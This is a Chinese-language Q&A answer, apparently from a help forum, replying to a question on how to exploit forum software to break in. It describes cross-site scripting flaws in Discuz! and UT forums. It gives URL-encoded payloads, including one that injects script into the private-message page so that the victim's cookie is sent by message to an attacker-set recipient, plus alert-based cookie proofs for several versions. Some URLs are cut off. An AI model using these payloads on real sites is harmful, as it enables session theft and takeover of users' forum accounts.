目前动网论坛的漏洞有那些？如何利用这些漏洞入侵动网？

在discuz！的发贴、回贴、PM等中的subject都没有经过过滤，所以也可以添加代码。 例如 /forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(documents.cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img] 发现discuz！UT 跨域站点的脚本漏洞－－短消息篇有关跨域站点的脚本漏洞，已经算是非常平成并普遍的漏洞了。 有关具体的消息可以参阅： /phpbbs/pm.php?action=send&username=name 的语句，但是name没有经过过滤直接显示在发送短消息的页面中，这就给偷cookie或者更严重的破坏打开了方便之门。 Discuz!3.X已经改为 /pm.php?action=send&uid=XXXX 类似的语句，避免了这个漏洞，但是在选择短信文件夹的时候却没有经过过滤。同样产生了上面的漏洞 例 /phpbbs/pm.php?action=s...d&username=name %22%3E%3Cscript%3Ealert(documents.cookie)%3C/script%3E%3Cb%22[/URL] ，上面的例子是显示自己的cookie。（针对Discuz!1.X Discuz!2.X) /pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22 显示自己的cookie。（针对Discuz!3.X) UT虽然在主题上经过了过滤，也就是说把%27转换为'；但是其收件人却没有过滤，所以同样有类似的漏洞。例子略。(在不同的UT论坛上发现其代码不尽相同，但是总的来说都有类似的漏洞）

希望采纳